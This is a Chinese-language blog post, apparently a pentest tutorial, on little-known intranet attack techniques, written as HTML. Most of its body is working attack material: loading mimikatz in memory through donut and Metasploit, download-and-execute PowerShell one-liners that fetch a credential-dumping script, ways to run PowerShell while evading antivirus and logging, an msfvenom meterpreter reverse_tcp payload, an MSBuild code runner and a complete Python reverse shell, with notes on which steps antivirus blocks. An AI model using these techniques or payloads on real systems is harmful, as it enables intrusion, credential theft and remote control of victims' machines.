

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/head.png">
  <link rel="icon" type="image/png" href="/img/head.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="SE_Null">
  <meta name="keywords" content="">
  <title>奇技淫巧 - SE_Null</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_pf9vaxs7x7b.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>SE_Null</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/5.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-10-13 16:24" pubdate>
        October 13, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      29
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">奇技淫巧</h1>
            
            <div class="markdown-body" id="post-body">
              <p>介绍一些在内网中罕见的攻击方式</p>
<a id="more"></a>


<h2 id="1-交互式内存加载"><a href="#1-交互式内存加载" class="headerlink" title="1.交互式内存加载"></a>1.交互式内存加载</h2><h3 id="Msf-donut交互式执行内存"><a href="#Msf-donut交互式执行内存" class="headerlink" title="Msf+donut交互式执行内存"></a>Msf+donut交互式执行内存</h3><p>msf得到一个会话</p>
<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204185453881.png" srcset="/img/loading.gif" alt="image-20210204185453881"></p>
<p>生成一个bin文件</p>
<pre><code class="hljs awk">.<span class="hljs-regexp">/donut -f /</span>root<span class="hljs-regexp">/webtools/</span>BypassAntiVirus<span class="hljs-regexp">/mimikatz/mimi</span>katz_trunk_2.<span class="hljs-number">2.0</span><span class="hljs-regexp">/x64/mimi</span>katz.exe  -a <span class="hljs-number">2</span> -o <span class="hljs-regexp">/tmp/</span>payload.bin
<span class="hljs-comment">#-f：指定文件位置</span>
<span class="hljs-comment">#－a：是指定位数，2-64位，1-32位</span>
<span class="hljs-comment">#－o：是指定输出</span></code></pre>

<p>再使用刚刚生成的bin文件</p>
<pre><code class="hljs awk">msf5 exploit(multi<span class="hljs-regexp">/handler) &gt; use post/</span>windows<span class="hljs-regexp">/manage/</span>shellcode_inject 
msf5 post(windows<span class="hljs-regexp">/manage/</span>shellcode_inject) &gt; set shellcode <span class="hljs-regexp">/tmp/</span>payloads.bin
shellcode =&gt; <span class="hljs-regexp">/tmp/</span>payloads.bin
msf5 post(windows<span class="hljs-regexp">/manage/</span>shellcode_inject) &gt; set session <span class="hljs-number">1</span>
session =&gt; <span class="hljs-number">1</span>
msf5 post(windows<span class="hljs-regexp">/manage/</span>shellcode_inject) &gt; run</code></pre>

<p>但是出错</p>
<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204185823677.png" srcset="/img/loading.gif" alt="image-20210204185823677"></p>
<p>因为我们生成木马是32位，机器是64位，使用将进程迁移到64的进程即可。</p>
<p>执行会得到一个交互式的mimikatz环境</p>
<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204190010171.png" srcset="/img/loading.gif" alt="image-20210204190010171"></p>
<p>这种方法在x86的机器上比较方便。</p>
<h3 id="2-无power-shell运行power-shell"><a href="#2-无power-shell运行power-shell" class="headerlink" title="2.无power shell运行power shell"></a>2.无power shell运行power shell</h3><h4 id="1-powerline"><a href="#1-powerline" class="headerlink" title="1.powerline"></a>1.powerline</h4><p>PowerLine是一款由c#编写的工具，支持本地命令行调用和远程调用，可以在不直接调用PowerShell的情况下调用PowerShell脚本.</p>
<p>优点：1.自动识别win7、win10系统  2.使用方便,无需复杂的ide  3.自动xor编码</p>
<p>下载地址： <a target="_blank" rel="noopener" href="https://github.com/fullmetalcache/PowerLine">https://github.com/fullmetalcache/PowerLine</a></p>
<p>首先将其项目放置目标机器，执行其bat文件（cmd下也可）</p>
<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204191318286.png" srcset="/img/loading.gif" alt="image-20210204191318286"></p>
<p>然后在UserConf.xml文件中填写你所需要调用的powershell脚本的地址，默认自带powerup、powerview、Mimikatz等，只要按照他给定的格式加入你的ps脚本地址即可</p>
<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204191638597.png" srcset="/img/loading.gif" alt="image-20210204191638597"></p>
<p>加入完成以后，运行PLBuilder.exe进行构建，构建过程中，被360杀了。。</p>
<p> <img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204191707416.png" srcset="/img/loading.gif" alt="image-20210204191707416"></p>
<p>一般AV只是检测PS发出的恶意请求，但由于在powerline中，请求是由powerline发出的，便绕过了一部分AV，但是缺点也是很明显，就是可扩展性太差，所有的功能依赖于配置文件…</p>
<h4 id="2-powershdll"><a href="#2-powershdll" class="headerlink" title="2.powershdll"></a>2.powershdll</h4><p>这个工具主要使用dll去运行powershell而不需要去连接powershell.exe,所以具有一定的bypassAV能力，当然它也可以在这几个程序下运行rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32.exe或者运行作者给的exe</p>
<p>下载地址： <a target="_blank" rel="noopener" href="https://github.com/p3nt4/PowerShdll">https://github.com/p3nt4/PowerShdll</a></p>
<p>1.exe用法</p>
<p>进入交互模式：<code>powershdll.exe -i</code>,获得了一个交互式的PS环境，可执行任意的powershell命令</p>
<p>在交互式模式下唯一要注意的就是，你输入的内容不能过长，否则会出现问题</p>
<p>2.dll用法</p>
<p>cmd下运行</p>
<pre><code class="hljs awk">rundll32 PowerShdll.dll,main . &#123; iwr -useb https:<span class="hljs-regexp">//</span>raw.githubusercontent.com<span class="hljs-regexp">/peewpw/</span>Invoke-WCMDump<span class="hljs-regexp">/master/</span>Invoke-WCMDump.ps1 &#125; ^| iex;</code></pre>

<p>被杀。。。</p>
<h4 id="3-Nopowershell"><a href="#3-Nopowershell" class="headerlink" title="3.Nopowershell"></a>3.Nopowershell</h4><p>NoPowerShell是用C＃实现的工具，它支持执行类似PowerShell的命令，同时对任何PowerShell日志记录机制都不可见。同时也提供了CS下的cna脚本。</p>
<p>优点：执行隐秘、功能强大、扩展简单</p>
<p>即使不熟悉PS命令也可以使用cmd命令来代替PS命令，例如(使用ping来代替Test-NetConnection)</p>
<p>下载地址：<a target="_blank" rel="noopener" href="https://github.com/bitsadmin/nopowershell.git">https://github.com/bitsadmin/nopowershell.git</a></p>
<p>直接运行便会输出它的版本和支持的命令</p>
<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204192140180.png" srcset="/img/loading.gif" alt="image-20210204192140180"></p>
<p>过程360无拦截</p>
<p>dll版会被秒杀</p>
<p>cs下稳定</p>
<h4 id="4-SyncAppvPublishingServer"><a href="#4-SyncAppvPublishingServer" class="headerlink" title="4.SyncAppvPublishingServer"></a>4.SyncAppvPublishingServer</h4><p>SyncAppvPublishingServer是win10自带的服务，有vbs和exe两个版本 默认存放在<code>C:\Windows\System32</code>下面</p>
<p>弹出计算器：C:\Windows\System32\SyncAppvPublishingServer.vbs “Break; Start-Process Calc.exe ”</p>
<p> <img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204192246804.png" srcset="/img/loading.gif" alt="image-20210204192246804"></p>
<p>或者</p>
<pre><code class="hljs latex">C:<span class="hljs-tag">\<span class="hljs-name">Windows</span></span><span class="hljs-tag">\<span class="hljs-name">System</span></span>32<span class="hljs-tag">\<span class="hljs-name">SyncAppvPublishingServer</span></span>.vbs &quot;Break; iwr http://192.168.1.149:443&quot;</code></pre>

<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204192445392.png" srcset="/img/loading.gif" alt="image-20210204192445392"></p>
<p>也可以去远程下载执行一些ps脚本就像下面这样：</p>
<pre><code class="hljs livescript">SyncAppvPublishingServer.exe <span class="hljs-string">\&quot;</span> Break; (New-<span class="hljs-built_in">Object</span> System.Net.WebClient).DownloadFile(<span class="hljs-string">&#x27;https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1&#x27;</span>,<span class="hljs-string">&#x27;$env:USERPROFILE/1.ps1&#x27;</span>); Start-Process <span class="hljs-string">&#x27;$env:USERPROFILE/1.ps1&#x27;</span> -WindowStyle Minimized;<span class="hljs-string">&quot;</span>
<span class="hljs-string"></span>
<span class="hljs-string">SyncAppvPublishingServer.exe &quot;</span>n;(New-<span class="hljs-built_in">Object</span> Net.WebClient).DownloadString(<span class="hljs-string">&#x27;https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1&#x27;</span>) | IEX<span class="hljs-string">&quot;</span></code></pre>



<h4 id="5-调用Msbuild-exe"><a href="#5-调用Msbuild-exe" class="headerlink" title="5.调用Msbuild.exe"></a>5.调用Msbuild.exe</h4><p>MSBuild是Microsoft .NET框架的一部分，是受信任的Windows二进制文件，可用于在未安装Visual Studio的环境中构建应用程序。从安全的角度来看，应将此二进制文件从系统中删除或由应用程序白名单解决方案阻止，以防止执行存储在具有以下扩展名的文件中的任意代码</p>
<p>MSBuild是.Net框架中包含的工具，用于自动化创建软件产品的过程，包括编译源代码，打包，测试，部署和创建文档。</p>
<p>该二进制文件执行本地存储在系统上的代码的能力可能导致逃避现有的安全控件（组策略，应用程序白名单等），从而阻止PowerShell或其他依赖PowerShell的类似工具。但是，不再需要MSBuild执行代码，因为可以使用.NET程序集，该程序集将从远程位置（UNC路径）调用恶意的.csproj。该技术不会留下任何痕迹，因为它不会接触磁盘，并且代码已注入到合法的Windows进程Internet Explorer中。</p>
<p>Msbuild依赖于.csproj文件，该文件具有XML语法，包含了.NET构建过程中的结果，类似于unix中的make，代码如下：</p>
<pre><code class="hljs pgsql">&lt;Project ToolsVersion=&quot;4.0&quot;
xmlns=&quot;http://schemas.microsoft.com/developer/msbuild/2003&quot;&gt;
&lt;Target <span class="hljs-type">Name</span>=&quot;MSPSLess&quot;&gt;
&lt;/Target&gt;
&lt;PSLess/&gt;
&lt;UsingTask TaskName=&quot;PSLess&quot; TaskFactory=&quot;CodeTaskFactory&quot;
AssemblyFile=
&quot;C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll&quot; &gt;
&lt;Task&gt;
&lt;Code <span class="hljs-keyword">Type</span>=&quot;Class&quot; Lang=&quot;cs&quot;&gt;
&lt;![CDATA[
<span class="hljs-keyword">using</span> <span class="hljs-keyword">System</span>.Collections.ObjectModel;
<span class="hljs-keyword">using</span> <span class="hljs-keyword">System</span>.Management.Automation;
<span class="hljs-keyword">using</span> <span class="hljs-keyword">System</span>.Management.Automation.Runspaces;
<span class="hljs-keyword">using</span> <span class="hljs-keyword">System</span>.Runtime.InteropServices;
<span class="hljs-keyword">using</span> <span class="hljs-keyword">System</span>.IO;
<span class="hljs-keyword">using</span> <span class="hljs-keyword">System</span>;
<span class="hljs-keyword">using</span> <span class="hljs-keyword">System</span>.Text;
<span class="hljs-keyword">using</span> <span class="hljs-keyword">System</span>.Runtime.InteropServices;
<span class="hljs-keyword">using</span> Microsoft.Build.Framework;
<span class="hljs-keyword">using</span> Microsoft.Build.Utilities;
<span class="hljs-built_in">public</span> <span class="hljs-keyword">class</span> PSLess :  Task
&#123;
  <span class="hljs-built_in">public</span> override <span class="hljs-type">bool</span> <span class="hljs-keyword">Execute</span>()
  &#123;
   string buffer = &quot;&quot;;
   try
   &#123;
     buffer = File.ReadAllText(&quot;c:/test/test.ps1&quot;);
   &#125;
   catch (<span class="hljs-keyword">Exception</span> e)
   &#123;
    Console.WriteLine(&quot;error:&quot; +e.Message);
    Environment.<span class="hljs-keyword">Exit</span>(<span class="hljs-number">2</span>);
   &#125;
   buffer=RunScript(buffer);
   Console.WriteLine(buffer);
   <span class="hljs-keyword">return</span> <span class="hljs-keyword">true</span>;
 &#125;
 private static string RunScript(string script)
  &#123;
    Runspace MyRunspace = RunspaceFactory.CreateRunspace();
    MyRunspace.<span class="hljs-keyword">Open</span>();
    Pipeline MyPipeline = MyRunspace.CreatePipeline();
    MyPipeline.Commands.AddScript(script);
    MyPipeline.Commands.<span class="hljs-keyword">Add</span>(&quot;Out-String&quot;);
    Collection&lt;PSObject&gt; outputs = MyPipeline.Invoke();
    MyRunspace.<span class="hljs-keyword">Close</span>();
    StringBuilder sb = <span class="hljs-built_in">new</span> StringBuilder();
    <span class="hljs-keyword">foreach</span> (PSObject pobject <span class="hljs-keyword">in</span> outputs)
    &#123;
      sb.AppendLine(pobject.ToString());
    &#125;
    <span class="hljs-keyword">return</span> sb.ToString();
   &#125;
&#125;
 
]]&gt;
&lt; / Code&gt;
&lt;/Task&gt;
&lt;/UsingTask&gt;
&lt;/Project&gt;</code></pre>

<p>test.ps1的内容如下：</p>
<pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;hello from powershell-less&quot;</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;this is your pid:<span class="hljs-variable">$PID</span>&quot;</span>
<span class="hljs-variable">$psversiontable</span></code></pre>

<p>执行test.ps1，效果：</p>
<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204204820918.png" srcset="/img/loading.gif" alt="image-20210204204820918"></p>
<p>github上类似的项目：<a target="_blank" rel="noopener" href="https://github.com/Cn33liz/MSBuildShell.git%EF%BC%8C%E6%89%A7%E8%A1%8C%E5%AE%8C%E5%8F%AF%E4%BB%A5%E8%8E%B7%E5%BE%97%E4%B8%80%E4%B8%AA%E4%BA%A4%E4%BA%92%E5%BC%8F%E7%9A%84ps">https://github.com/Cn33liz/MSBuildShell.git，执行完可以获得一个交互式的ps</a></p>
<h2 id="3-msbuild-without-msbuild"><a href="#3-msbuild-without-msbuild" class="headerlink" title="3.msbuild_without_msbuild"></a>3.msbuild_without_msbuild</h2><p>不使用msbuild调用msbuild来构建程序的方法。</p>
<p>生成一个msf的payload并编码</p>
<pre><code class="hljs routeros">msfvenom -p windows/x64/meterpreter/reverse_tcp -f<span class="hljs-built_in"> raw </span>-o payload64.bin <span class="hljs-attribute">LHOST</span>=10.0.0.1 <span class="hljs-attribute">LPORT</span>=2000 base64 -i /root/payload64.bin &gt; payload64.txt</code></pre>

<p>然后使用下面的方法得到一个dll文件</p>
<pre><code class="hljs apache"><span class="hljs-attribute">C</span>:\Windows\Microsoft.Net\Framework\v<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.<span class="hljs-number">30319</span>\csc.exe /reference:<span class="hljs-string">&quot;Microsoft.Build.Framework.dll&quot;</span>;<span class="hljs-string">&quot;Microsoft.Build.Tasks.v4.0.dll&quot;</span>;<span class="hljs-string">&quot;Microsoft.Build.Utilities.v4.0.dll&quot;</span> /target:library IEShim.cs</code></pre>

<p>得到dll后将msbuildapicaller.cs 的第60行替换成你smb服务器的程序地址..</p>
<p>smb服务器可以使用impacket开启</p>
<pre><code class="hljs arcade">impacket-smbserver share <span class="hljs-string">`pwd`</span></code></pre>

<p>替换msbuildapicaller.csproj中的shellcode与dll地址</p>
<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204211852420.png" srcset="/img/loading.gif" alt="image-20210204211852420"></p>
<p>然后编译</p>
<pre><code class="hljs apache"><span class="hljs-attribute">C</span>:\Windows\Microsoft.Net\Framework\v<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.<span class="hljs-number">30319</span>\csc.exe /reference:<span class="hljs-string">&quot;Microsoft.Build.Framework.dll&quot;</span>;<span class="hljs-string">&quot;Microsoft.Build.dll&quot;</span>;<span class="hljs-string">&quot;Microsoft.Build.Engine.dll&quot;</span>;<span class="hljs-string">&quot;Microsoft.Build.Utilities.v4.0.dll&quot;</span>;<span class="hljs-string">&quot;System.Runtime.dll&quot;</span> /target:exe msbuildapicaller.cs</code></pre>

<p>得到exe文，件，可以使用Assembly MSBuildApiCaller.exe去执行</p>
<h2 id="4-自写shell"><a href="#4-自写shell" class="headerlink" title="4.自写shell"></a>4.自写shell</h2><p>编写反弹shell的原理</p>
<p><img src="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/image-20210204212921171.png" srcset="/img/loading.gif" alt="image-20210204212921171"></p>
<p>简单的客户端，服务端</p>
<pre><code class="hljs livecodeserver">import <span class="hljs-built_in">socket</span>
phone = <span class="hljs-built_in">socket</span>.<span class="hljs-built_in">socket</span>(<span class="hljs-built_in">socket</span>.AF_INET,<span class="hljs-built_in">socket</span>.SOCK_STREAM)
phone.bind((<span class="hljs-string">&#x27;127.0.0.1&#x27;</span>,<span class="hljs-number">2333</span>))
phone.listen()
phone.accept()</code></pre>

<pre><code class="hljs livecodeserver">import <span class="hljs-built_in">socket</span>
phone = <span class="hljs-built_in">socket</span>.<span class="hljs-built_in">socket</span>(<span class="hljs-built_in">socket</span>.AF_INET,<span class="hljs-built_in">socket</span>.SOCK_STREAM)
phone.connect((<span class="hljs-string">&#x27;127.0.0.1&#x27;</span>,<span class="hljs-number">2333</span>))</code></pre>

<p>一些常用的实现通信的函数</p>
<pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">recv</span><span class="hljs-params">()</span></span> #接受TCP数据
<span class="hljs-function"><span class="hljs-title">send</span><span class="hljs-params">()</span></span> #发送TCP数据
<span class="hljs-function"><span class="hljs-title">recvfrom</span><span class="hljs-params">()</span></span> #接受UDP数据
<span class="hljs-function"><span class="hljs-title">sendto</span><span class="hljs-params">()</span></span> #发送UDP数据
<span class="hljs-function"><span class="hljs-title">getpeername</span><span class="hljs-params">()</span></span> #接收到当前套接字远端的地址
<span class="hljs-function"><span class="hljs-title">getsockname</span><span class="hljs-params">()</span></span> #返回指定套接字的参数
<span class="hljs-function"><span class="hljs-title">setsockopt</span><span class="hljs-params">()</span></span> #设置指定套接字的参数
<span class="hljs-function"><span class="hljs-title">close</span><span class="hljs-params">()</span></span> #关闭套接字</code></pre>

<p>需要一个能够实现执行命令并返回会话的模块：subprocess</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> subprocess
<span class="hljs-comment">#Popen方法是用来执行系统命令的，直接把结果打印到终端了</span>
res =subprocess.Popen(<span class="hljs-string">r&#x27;dir&#x27;</span>,shell=<span class="hljs-literal">True</span>,
                       <span class="hljs-comment">#r&#x27;dsfsdfr&#x27;,shell=True,</span>
                      <span class="hljs-comment"># stdin= #标准输入（不常用）</span>
                       stdout=subprocess.PIPE,<span class="hljs-comment">#stdout 标准输出</span>
                       stderr=subprocess.PIPE) <span class="hljs-comment">#stderr 标准错误</span>
print(res.stdout.read().decode(<span class="hljs-string">&#x27;gbk&#x27;</span>))</code></pre>

<p>简单的例子</p>
<pre><code class="hljs livecodeserver">import <span class="hljs-built_in">socket</span>
import subprocess
import sys


def reve_shell(host,port):

    host = <span class="hljs-built_in">socket</span>.gethostbyname(host)
    <span class="hljs-built_in">shell</span> = <span class="hljs-built_in">socket</span>.<span class="hljs-built_in">socket</span>(<span class="hljs-built_in">socket</span>.AF_INET,<span class="hljs-built_in">socket</span>.SOCK_STREAM)
    <span class="hljs-built_in">shell</span>.connect((host,port))

    <span class="hljs-keyword">while</span> True:
        cmd = <span class="hljs-built_in">shell</span>.recv(<span class="hljs-number">1024</span>)
        res = subprocess.Popen(cmd.decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>),
                               <span class="hljs-built_in">shell</span>=True,
                               <span class="hljs-keyword">stdout</span>=subprocess.PIPE,
                               <span class="hljs-keyword">stderr</span>=subprocess.PIPE)
        <span class="hljs-keyword">stdout</span> = res.<span class="hljs-keyword">stdout</span>.<span class="hljs-built_in">read</span>()
        <span class="hljs-keyword">stderr</span> = res.<span class="hljs-keyword">stderr</span>.<span class="hljs-built_in">read</span>()

        <span class="hljs-built_in">shell</span>.<span class="hljs-built_in">send</span>(<span class="hljs-keyword">stdout</span>+<span class="hljs-keyword">stderr</span>)

    <span class="hljs-built_in">shell</span>.<span class="hljs-built_in">close</span>()

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:

    host = sys.argv[<span class="hljs-number">1</span>]
    port = int(sys.argv[<span class="hljs-number">2</span>])
    reve_shell(host=host,port=port)
</code></pre>

<p>可以直接执行，也可以打包为exe执行：<code>pyinstaller -F myfile.py</code></p>
<p>文章参考：</p>
<p><a target="_blank" rel="noopener" href="https://iwantmore.pizza/posts/meterpreter-shellcode-inject.html">https://iwantmore.pizza/posts/meterpreter-shellcode-inject.html</a></p>
<p><a target="_blank" rel="noopener" href="https://lengjibo.github.io/psbypass/">https://lengjibo.github.io/psbypass/</a></p>
<p><a target="_blank" rel="noopener" href="https://lengjibo.github.io/msbuild/">https://lengjibo.github.io/msbuild/</a></p>
<p><a target="_blank" rel="noopener" href="https://pentestlaboratories.com/2020/01/27/msbuild-without-msbuild/">https://pentestlaboratories.com/2020/01/27/msbuild-without-msbuild/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.sec-in.com/article/178">https://www.sec-in.com/article/178</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/">内网安全</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Msf-donut%E4%BA%A4%E4%BA%92%E5%BC%8F%E6%89%A7%E8%A1%8C%E5%86%85%E5%AD%98/">Msf+donut交互式执行内存</a>
                    
                      <a class="hover-with-bg" href="/tags/%E6%97%A0powershell%E8%BF%90%E8%A1%8Cpowershell%E4%BA%94%E7%A7%8D%E6%96%B9%E5%BC%8F/">无powershell运行powershell五种方式</a>
                    
                      <a class="hover-with-bg" href="/tags/msbuild-without-msbuild/">msbuild_without_msbuild</a>
                    
                      <a class="hover-with-bg" href="/tags/%E8%87%AA%E5%86%99shell/">自写shell</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">白银票据和黄金票据</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/10/12/%E5%9F%9F%E5%86%85%E6%94%BB%E5%87%BB/">
                        <span class="hidden-mobile">域内攻击</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <!-- <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div> -->
    
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
